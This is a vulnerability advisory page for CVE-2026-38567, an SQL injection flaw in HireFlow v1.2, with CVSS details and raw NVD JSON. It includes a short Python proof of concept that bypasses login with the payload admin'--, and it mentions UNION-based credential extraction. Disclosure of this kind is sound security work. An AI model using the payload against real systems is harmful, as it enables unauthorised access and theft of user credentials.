Security Vulnerability Report
中文
CVE-2026-38567 CVSS 9.8 CRITICAL

CVE-2026-38567

Published: 2026-05-11 18:16:33
Last Modified: 2026-05-12 15:06:07

Description

HireFlow v1.2 is vulnerable to SQL injection in the /login and /search endpoints. User-supplied input is concatenated directly into SQL queries without parameterization. An unauthenticated attacker can bypass authentication by supplying a crafted username (e.g. admin'--) or extract the full contents of the database including user credentials via UNION-based injection at the /search endpoint.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HireFlow 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli_auth_bypass(url): """ PoC for Authentication Bypass via SQL Injection in /login endpoint. """ target = f"{url}/login" # Payload to bypass authentication: admin'-- # This closes the string and comments out the rest of the query payload = { "username": "admin'--", "password": "anything" } try: response = requests.post(target, data=payload, timeout=10) if response.status_code == 200 and "dashboard" in response.text.lower(): print("[+] Vulnerability confirmed: Authentication bypassed.") return True else: print("[-] Vulnerability not detected or response format changed.") return False except Exception as e: print(f"[-] Error connecting to target: {e}") return False if __name__ == "__main__": target_url = "http://localhost:8000" # Replace with actual target check_sqli_auth_bypass(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38567", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:32.857", "lastModified": "2026-05-12T15:06:07.407", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HireFlow v1.2 is vulnerable to SQL injection in the /login and /search endpoints. User-supplied input is concatenated directly into SQL queries without parameterization. An unauthenticated attacker can bypass authentication by supplying a crafted username (e.g. admin'--) or extract the full contents of the database including user credentials via UNION-based injection at the /search endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/StratonWebDesigners/HireFlow", "source": "[email protected]"}, {"url": "https://github.com/hijackedamygdala/CVE-Disclosures/tree/main/HireFlow/CVE-2026-38567", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/python/18688/hireflow-%E2%80%93-complete-interview-management-system.html", "source": "[email protected]"}, {"url": "https://github.com/hijackedamygdala/CVE-Disclosures/tree/main/HireFlow/CVE-2026-38567", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}